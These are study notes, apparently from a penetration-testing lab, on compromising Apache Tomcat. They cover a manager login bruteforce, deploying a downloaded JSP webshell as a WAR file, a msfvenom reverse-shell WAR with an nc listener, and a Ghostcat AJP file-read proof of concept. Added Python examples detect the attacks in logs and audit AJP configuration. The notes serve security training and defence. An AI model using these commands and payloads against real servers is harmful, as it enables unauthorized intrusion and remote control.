# Intro
- As described in the previous section, once we have identified a Tomcat instance and can access the `/manager` or `/host-manager` endpoints, we can likely achieve RCE on the Tomcat server
# Tomcat Manager - Login Bruteforce
## MSF module
- As one example, we can use the [auxiliary/scanner/http/tomcat_mgr_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login/) Metasploit module
```shell-session
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
```
- We get a hit for `tomcat:admin` from the above
- If we are having issues, we can always use `Burp` to proxy the traffic and troubleshoot
- To do this, first, fire up Burp Suite and then set the `PROXIES` option like the following
```bash
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set PROXIES HTTP:127.0.0.1:8080
```
- We can see how the scanner is working from the `Burp` requests ![[images/Pasted image 20260121191736.png]]
## Python script
- We can also use [this](https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce) Python script to achieve the same result
- The `-P` flag is used to specify the path such as `/manager`
- The `-u` flag is used to specify a username list, and the `-p` flag is used to specify a password list
```bash
python3 mgr_brute.py -h #shows help menu
python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
```
# Tomcat Manager - WAR File Upload
- Many Tomcat installations provide a GUI interface to manage the application
- This interface is available at `/manager/html` by default, which only users assigned the `manager-gui` role are allowed to access ![[images/Pasted image 20260121192128.png]]
- Valid manager credentials can be used to upload a packaged Tomcat application (.WAR file) and compromise the application
- A WAR, or Web Application Archive, is used to quickly deploy web applications and backup storage
- A WAR file can be created using the zip utility
## JSP webshell
- A JSP web shell such as [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) can be downloaded and placed within the archive
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
```
- Click `Browse` and select the above `.war` file, then click `Deploy` ![[images/Pasted image 20260121192254.png]]
- This file is uploaded through the manager GUI, after which the `/backup` application will be added to the table ![[images/Pasted image 20260121192327.png]]
- Note: The upload location is `/opt/tomcat/apache-tomcat-10.0.10/webapps`
- If we click on `backup`, we will get redirected to `http://web01.inlanefreight.local:8180/backup/` and get a `404 Not Found` error
- Instead, we need to specify the `cmd.jsp` file in the URL as well by browsing or using `cURL` on `http://web01.inlanefreight.local:8180/backup/cmd.jsp`
- This will present us with a web shell that we can use to run commands on the Tomcat server
```bash
curl 'http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id'   # quoted so the shell does not treat ? as a glob
```
## MSFVenom
- We could also use `msfvenom` to generate a malicious WAR file
- The payload [java/jsp_shell_reverse_tcp](https://github.com/iagox86/metasploit-framework-webexec/blob/master/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb) will execute a reverse shell through a JSP file
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
```
- Browse to the Tomcat console and deploy this file
- Tomcat automatically extracts the WAR file contents and deploys it
- Start an `nc` listener with `nc -lvnp 4443` and click on `/backup` to execute the shell
## MSF Module
- The [multi/http/tomcat_mgr_upload](https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_upload/) Metasploit module can be used to automate the process shown above
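A defender-side view of both the login bruteforce and the WAR deployment described above: this is an added example, not code from the page or from any of the tools it references. It runs two detection rules over constructed Tomcat access-log lines in the default `AccessLogValve` format; the hosts, timestamps and the failure threshold are assumed values.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines (assumed hosts/timestamps): five failed manager
# logins, a success, a WAR upload through the HTML manager, then the new app
SAMPLE_LOG = """\
10.10.14.15 - - [21/Jan/2026:19:17:36 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Jan/2026:19:17:36 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Jan/2026:19:17:37 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Jan/2026:19:17:37 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - - [21/Jan/2026:19:17:38 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.15 - tomcat [21/Jan/2026:19:17:39 +0000] "GET /manager/html HTTP/1.1" 200 11830
10.10.14.15 - tomcat [21/Jan/2026:19:22:54 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 303 -
10.10.14.15 - - [21/Jan/2026:19:23:10 +0000] "GET /backup/cmd.jsp?cmd=id HTTP/1.1" 200 312
192.168.1.20 - admin [21/Jan/2026:19:30:00 +0000] "GET /manager/html HTTP/1.1" 200 11830
"""

def parse(log_text):
    # Yield one dict per line that matches the access-log pattern
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def detect(log_text, threshold=5):
    """Return (host, finding) pairs: a burst of 401s on the manager apps, a later
    non-error manager response from that host, and any hit on upload/deploy."""
    failures = defaultdict(int)
    findings = []
    for e in parse(log_text):
        host, status = e["host"], int(e["status"])
        route = e["path"].split("?", 1)[0]   # drop the query string
        on_manager = route.startswith(("/manager", "/host-manager"))
        if on_manager and status == 401:
            failures[host] += 1
            if failures[host] == threshold:  # fire once per host
                findings.append((host, "BRUTEFORCE"))
        elif on_manager and status < 400 and failures[host] >= threshold:
            findings.append((host, "SUCCESS_AFTER_BRUTEFORCE"))
            failures[host] = 0               # report the success once
        if route in ("/manager/html/upload", "/manager/text/deploy") and status < 400:
            findings.append((host, "WAR_DEPLOY " + route))
    return findings
```

The benign `192.168.1.20` login produces no finding, while the attacker host yields the bruteforce, the success and the deployment in order.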
# CVE-2020-1938 : Ghostcat
- Tomcat was found to be vulnerable to an unauthenticated LFI in a semi-recent discovery named [Ghostcat](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938)
- All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable
- This vuln was caused by a misconfiguration in the AJP protocol used by Tomcat, where AJP stands for Apache JServ Protocol, a binary protocol used to proxy requests
- This is typically used in proxying requests to application servers behind the front-end web servers
- The AJP service typically runs on port 8009; let's check with the below `nmap` scan
```bash
nmap -sV -p 8009,8080 app-dev.inlanefreight.local
```
- Assuming the above scan confirms that ports 8080 and 8009 are open, the PoC code for the vuln can be found [here](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi)
- Download the script and save it locally
- The exploit can only read files and folders within the web apps folder, which means that files like `/etc/passwd` can’t be accessed
- So, let’s attempt to access `web.xml`
```bash
python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
```
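The Ghostcat exposure comes down to an AJP connector reachable from the network without a shared secret. This added example (not from the page or the PoC repository) audits the `Connector` elements of a `server.xml` and flags the weak form beside a hardened one; the XML fragments and the `REPLACE_ME` secret are constructed placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (not from the page or any real host).
# The weak form is the connector shape Tomcat shipped before the fix:
# AJP on 8009, bound to every interface, no shared secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

# Hardened form: loopback only plus a shared secret the front-end proxy
# must present (REPLACE_ME is a placeholder, not a real secret).
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"
               address="127.0.0.1" secretRequired="true" secret="REPLACE_ME" />
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_ajp(server_xml):
    """Return (port, issue) pairs for every AJP connector reachable the way
    Ghostcat needs: off-loopback and/or without a shared secret."""
    issues = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue  # HTTP connectors are out of scope for this check
        port = conn.get("port", "?")
        if conn.get("address") not in LOOPBACK:
            issues.append((port, "AJP listens on all interfaces; bind it to "
                                 "127.0.0.1 or remove the connector"))
        if conn.get("secretRequired", "true").lower() == "false" \
                or not conn.get("secret"):
            issues.append((port, "AJP has no shared secret; set "
                                 "secretRequired=\"true\" and a secret"))
    return issues
```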
# Exercise
## Initial Enum
- `ping` test ![[images/Pasted image 20260121193457.png]]
- `nmap` scans ![[images/Pasted image 20260121193658.png]]
- modify `/etc/hosts` ![[images/Pasted image 20260121193541.png]]
- visit page ![[images/Pasted image 20260121193631.png]]
## Login Bruteforce
- Use `tomcat_mgr_login` module from MSF ![[images/Pasted image 20260121193752.png]]
- Set options ![[images/Pasted image 20260121193921.png]]
- Creds found ![[images/Pasted image 20260121194016.png]]
## Gain RCE
- Use `msfvenom` to create the payload
```bash
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.161 LPORT=4443 -f war -o backup.war
```
- Browse to `http://web01.inlanefreight.local:8180/manager/html` and enter creds
- we're in ![[images/Pasted image 20260121194331.png]]
- Browse for a `.war` file to deploy, then click `Deploy`
- We see `/backup` in the table now ![[images/Pasted image 20260121194437.png]]
- Browse to `http://web01.inlanefreight.local:8180/backup/`
- We have a hit on our listener ![[images/Pasted image 20260121194610.png]]
- Find `tomcat_flag.txt`
- Note: file upload location is `/opt/tomcat/apache-tomcat-10.0.10/webapps` ![[images/Pasted image 20260121200032.png]]